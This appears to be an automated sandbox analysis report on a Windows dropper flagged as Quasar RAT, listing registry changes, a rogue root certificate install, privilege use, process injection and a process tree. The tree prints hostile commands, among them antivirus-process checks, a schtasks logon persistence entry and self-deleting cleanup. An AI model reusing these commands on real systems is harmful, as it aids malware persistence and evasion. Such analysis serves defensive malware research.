\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\LocalServer32\ = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\GoogleUpdateOnDemand.exe\"" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\NumMethods\ = "12" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C} GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\NumMethods GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\ = "IBrowserHttpRequest2" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32 GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603} GoogleUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69}\VERSIONINDEPENDENTPROGID GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\NumMethods GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E225E692-4B47-4777-9BED-4FD7FE257F0E} GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\NumMethods GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D} GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\LocalServer32 GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachineFallback.1.0\ = "Google Update Legacy On Demand" GoogleUpdate.exe Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\7 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7DE94008-8AFD-4C70-9728-C6FBFFF6A73E}\VersionIndependentProgID\ = "GoogleUpdate.CoCreateAsync" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\NumMethods\ = "10" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\ = "IGoogleUpdate3" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ = "IAppCommandWeb" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B} GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA} GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\NumMethods GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\NumMethods GoogleUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\INPROCSERVER32 GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32 GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\ = "ICredentialDialog" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\NumMethods GoogleUpdateComRegisterShell64.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe -
Runs ping.exe 1 TTPs 11 IoCs
pid Process 9448 PING.EXE 7064 PING.EXE 772 PING.EXE 8144 PING.EXE 7956 PING.EXE 9800 PING.EXE 9560 PING.EXE 6408 PING.EXE 2152 PING.EXE 7336 PING.EXE 872 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7884 schtasks.exe 5048 schtasks.exe 9036 schtasks.exe 1520 schtasks.exe 5636 schtasks.exe 6624 schtasks.exe 3304 schtasks.exe 2756 schtasks.exe 4856 schtasks.exe 5652 schtasks.exe 5248 schtasks.exe 1008 schtasks.exe 6860 schtasks.exe 5784 schtasks.exe 5124 schtasks.exe 6692 schtasks.exe 1640 schtasks.exe 1152 schtasks.exe 2968 schtasks.exe 1124 schtasks.exe 10152 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 4768 2020.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 4216 Blsvr.exe 4216 Blsvr.exe 4216 Blsvr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2432 taskmgr.exe 3256 Explorer.EXE -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5216 music.exe 5252 InstallerPack_20.1.23770_win64.exe 5756 ftp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2084 4363463463464363463463463.exe Token: SeDebugPrivilege 2432 taskmgr.exe Token: SeSystemProfilePrivilege 2432 taskmgr.exe Token: SeCreateGlobalPrivilege 2432 taskmgr.exe Token: SeDebugPrivilege 4768 2020.exe Token: SeShutdownPrivilege 3272 powercfg.exe Token: SeCreatePagefilePrivilege 3272 powercfg.exe Token: SeLockMemoryPrivilege 3620 conhost.exe Token: SeLockMemoryPrivilege 3620 conhost.exe Token: SeShutdownPrivilege 2044 powercfg.exe Token: SeCreatePagefilePrivilege 2044 powercfg.exe Token: SeShutdownPrivilege 3064 powercfg.exe Token: SeCreatePagefilePrivilege 3064 powercfg.exe Token: SeShutdownPrivilege 3332 powercfg.exe Token: SeCreatePagefilePrivilege 3332 powercfg.exe Token: SeDebugPrivilege 776 svchost.exe Token: SeSecurityPrivilege 2432 taskmgr.exe Token: SeTakeOwnershipPrivilege 2432 taskmgr.exe Token: SeDebugPrivilege 3816 tasklist.exe Token: SeDebugPrivilege 2008 tasklist.exe Token: SeDebugPrivilege 4872 powershell.exe Token: SeDebugPrivilege 4544 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 4112 ConsoleApp3.exe Token: SeDebugPrivilege 776 svchost.exe Token: SeDebugPrivilege 1876 tasklist.exe Token: SeDebugPrivilege 864 tasklist.exe Token: SeDebugPrivilege 3312 svchost.exe Token: SeDebugPrivilege 3732 svchost.exe Token: SeDebugPrivilege 500 firefox.exe Token: SeDebugPrivilege 500 firefox.exe Token: SeDebugPrivilege 4252 anubis.exe Token: SeDebugPrivilege 5628 svchost.exe Token: SeDebugPrivilege 2884 svchost.exe Token: SeDebugPrivilege 500 firefox.exe Token: SeDebugPrivilege 500 firefox.exe Token: SeDebugPrivilege 500 firefox.exe Token: SeDebugPrivilege 5228 svchost.exe Token: SeDebugPrivilege 6036 svchost.exe Token: SeDebugPrivilege 5660 4363463463464363463463463.exe Token: SeDebugPrivilege 4044 4363463463464363463463463.exe Token: SeDebugPrivilege 500 firefox.exe Token: SeDebugPrivilege 5796 tasklist.exe Token: SeDebugPrivilege 6052 tasklist.exe Token: SeDebugPrivilege 5460 svchost.exe Token: SeDebugPrivilege 3360 XClient.exe Token: SeDebugPrivilege 5952 powershell.exe Token: SeDebugPrivilege 5740 powershell.exe Token: SeDebugPrivilege 2024 powershell.exe Token: SeDebugPrivilege 5932 powershell.exe Token: SeDebugPrivilege 3360 XClient.exe Token: SeDebugPrivilege 4752 SDASD.exe Token: SeDebugPrivilege 5712 svchost.exe Token: SeDebugPrivilege 5516 svchost.exe Token: SeDebugPrivilege 3160 SDASD.exe Token: SeDebugPrivilege 500 firefox.exe Token: SeShutdownPrivilege 6028 powercfg.exe Token: SeCreatePagefilePrivilege 6028 powercfg.exe Token: SeShutdownPrivilege 5948 powercfg.exe Token: SeCreatePagefilePrivilege 5948 powercfg.exe Token: SeShutdownPrivilege 5468 powercfg.exe Token: SeCreatePagefilePrivilege 5468 powercfg.exe Token: SeShutdownPrivilege 5776 powercfg.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 3620 conhost.exe 2432 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 2432 taskmgr.exe 3620 conhost.exe 2432 taskmgr.exe -
Suspicious use of SetWindowsHookEx 38 IoCs
pid Process 776 svchost.exe 500 firefox.exe 2828 injectorOld.exe 6012 golden.exe 3360 XClient.exe 5688 Cooper.pif 5228 OpenWith.exe 5228 OpenWith.exe 5228 OpenWith.exe 6068 svchost.exe 1876 XClient.exe 5348 up.exe 5348 up.exe 1140 hs.exe 864 RegAsm.exe 5252 DEF.exe 5216 music.exe 5932 iexplore.exe 5252 InstallerPack_20.1.23770_win64.exe 6760 systemware.exe 6504 CrazyCoach.exe 6504 CrazyCoach.exe 6504 CrazyCoach.exe 6504 CrazyCoach.exe 7156 jerniuiopu.exe 6088 Discord.exe 6528 Discord.exe 6956 s.exe 6264 systemware.exe 2240 MePaxil.exe 3520 Legend.pif 6132 systemware.exe 2812 keygen.exe 6868 new_v8.exe 6644 t1.exe 3468 systemware.exe 4580 12.exe 3692 RegAsm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2084 wrote to memory of 4512 2084 4363463463464363463463463.exe 78 PID 2084 wrote to memory of 4512 2084 4363463463464363463463463.exe 78 PID 2084 wrote to memory of 4512 2084 4363463463464363463463463.exe 78 PID 4512 wrote to memory of 4592 4512 cccc2.exe 80 PID 4512 wrote to memory of 4592 4512 cccc2.exe 80 PID 4512 wrote to memory of 4592 4512 cccc2.exe 80 PID 4512 wrote to memory of 4592 4512 cccc2.exe 80 PID 4512 wrote to memory of 4592 4512 cccc2.exe 80 PID 4512 wrote to memory of 4592 4512 cccc2.exe 80 PID 4512 wrote to memory of 4592 4512 cccc2.exe 80 PID 4512 wrote to memory of 4592 4512 cccc2.exe 80 PID 4512 wrote to memory of 4592 4512 cccc2.exe 80 PID 2084 wrote to memory of 3744 2084 4363463463464363463463463.exe 87 PID 2084 wrote to memory of 3744 2084 4363463463464363463463463.exe 87 PID 3744 wrote to memory of 4768 3744 2020.exe 88 PID 3744 wrote to memory of 4768 3744 2020.exe 88 PID 4768 wrote to memory of 1324 4768 2020.exe 89 PID 4768 wrote to memory of 1324 4768 2020.exe 89 PID 4768 wrote to memory of 2932 4768 2020.exe 91 PID 4768 wrote to memory of 2932 4768 2020.exe 91 PID 2932 wrote to memory of 4216 2932 cmd.exe 93 PID 2932 wrote to memory of 4216 2932 cmd.exe 93 PID 2084 wrote to memory of 1164 2084 4363463463464363463463463.exe 95 PID 2084 wrote to memory of 1164 2084 4363463463464363463463463.exe 95 PID 2084 wrote to memory of 1164 2084 4363463463464363463463463.exe 95 PID 2084 wrote to memory of 2236 2084 4363463463464363463463463.exe 96 PID 2084 wrote to memory of 2236 2084 4363463463464363463463463.exe 96 PID 2084 wrote to memory of 2236 2084 4363463463464363463463463.exe 96 PID 468 wrote to memory of 2364 468 cmd.exe 99 PID 468 wrote to memory of 2364 468 cmd.exe 99 PID 468 wrote to memory of 1028 468 cmd.exe 100 PID 468 wrote to memory of 1028 468 cmd.exe 100 PID 468 wrote to memory of 3472 468 cmd.exe 101 PID 468 wrote to memory of 3472 468 cmd.exe 101 PID 468 wrote to memory of 4752 468 cmd.exe 102 PID 468 wrote to memory of 4752 468 cmd.exe 102 PID 468 wrote to memory of 1948 468 cmd.exe 103 PID 468 wrote to memory of 1948 468 cmd.exe 103 PID 4544 wrote to memory of 3272 4544 cmd.exe 106 PID 4544 wrote to memory of 3272 4544 cmd.exe 106 PID 4216 wrote to memory of 3620 4216 Blsvr.exe 107 PID 4544 wrote to memory of 2044 4544 cmd.exe 108 PID 4544 wrote to memory of 2044 4544 cmd.exe 108 PID 4544 wrote to memory of 3064 4544 cmd.exe 109 PID 4544 wrote to memory of 3064 4544 cmd.exe 109 PID 4544 wrote to memory of 3332 4544 cmd.exe 110 PID 4544 wrote to memory of 3332 4544 cmd.exe 110 PID 2236 wrote to memory of 1104 2236 npp.exe 112 PID 2236 wrote to memory of 1104 2236 npp.exe 112 PID 2236 wrote to memory of 1104 2236 npp.exe 112 PID 2084 wrote to memory of 3136 2084 4363463463464363463463463.exe 113 PID 2084 wrote to memory of 3136 2084 4363463463464363463463463.exe 113 PID 2084 wrote to memory of 3136 2084 4363463463464363463463463.exe 113 PID 2084 wrote to memory of 432 2084 4363463463464363463463463.exe 114 PID 2084 wrote to memory of 432 2084 4363463463464363463463463.exe 114 PID 2084 wrote to memory of 432 2084 4363463463464363463463463.exe 114 PID 2084 wrote to memory of 1444 2084 4363463463464363463463463.exe 115 PID 2084 wrote to memory of 1444 2084 4363463463464363463463463.exe 115 PID 2084 wrote to memory of 1796 2084 4363463463464363463463463.exe 117 PID 2084 wrote to memory of 1796 2084 4363463463464363463463463.exe 117 PID 2084 wrote to memory of 1796 2084 4363463463464363463463463.exe 117 PID 1796 wrote to memory of 3540 1796 sgx4824p.exe 118 PID 1796 wrote to memory of 3540 1796 sgx4824p.exe 118 PID 1796 wrote to memory of 3540 1796 sgx4824p.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3256 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Quasar RAT
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\Files\cccc2.exe"C:\Users\Admin\AppData\Local\Temp\Files\cccc2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 4245⤵
- Program crash
PID:2400
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:1324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\_MEI37442\Blsvr.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Users\Admin\AppData\Local\Temp\_MEI37442\Blsvr.exeC:\Users\Admin\AppData\Local\Temp\_MEI37442\Blsvr.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4216
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RDX123456.exe"C:\Users\Admin\AppData\Local\Temp\Files\RDX123456.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1164
-
-
C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\519810010.exeC:\Users\Admin\AppData\Local\Temp\519810010.exe4⤵
- Executes dropped EXE
PID:1104
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Files\Loader.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3136
-
-
C:\Users\Admin\AppData\Local\Temp\Files\m.exe"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"3⤵
- Executes dropped EXE
PID:432
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cdb.exe"C:\Users\Admin\AppData\Local\Temp\Files\cdb.exe"3⤵
- Executes dropped EXE
PID:1444
-
-
C:\Users\Admin\AppData\Local\Temp\Files\sgx4824p.exe"C:\Users\Admin\AppData\Local\Temp\Files\sgx4824p.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Za Za.bat & Za.bat4⤵
- System Location Discovery: System Language Discovery
PID:3540 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3816
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
PID:4632
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵
- System Location Discovery: System Language Discovery
PID:4352
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3859025⤵
- System Location Discovery: System Language Discovery
PID:3052
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "VECOVERAGEGATESOCCURRING" Scottish5⤵PID:2092
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dirt + ..\Contacts + ..\Syria + ..\Gross + ..\Ministry + ..\Infected + ..\Trout + ..\Reforms + ..\Highlighted + ..\Mas + ..\Rotary + ..\Preston + ..\Remove + ..\Clock + ..\Liquid + ..\Isa + ..\Cape d5⤵
- System Location Discovery: System Language Discovery
PID:3724
-
-
C:\Users\Admin\AppData\Local\Temp\385902\But.pifBut.pif d5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:584 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "TradeSwan" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeOptimize Solutions\TradeSwan.js'" /sc onlogon /F /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:2968
-
-
C:\Users\Admin\AppData\Local\Temp\385902\But.pifC:\Users\Admin\AppData\Local\Temp\385902\But.pif6⤵
- Executes dropped EXE
PID:2804
-
-
C:\Users\Admin\AppData\Local\Temp\385902\But.pifC:\Users\Admin\AppData\Local\Temp\385902\But.pif6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2356 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\385902\But.pif" & rd /s /q "C:\ProgramData\CGHCGIIDGDAK" & exit7⤵PID:2160
-
C:\Windows\SysWOW64\timeout.exetimeout /t 108⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4044
-
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 155⤵
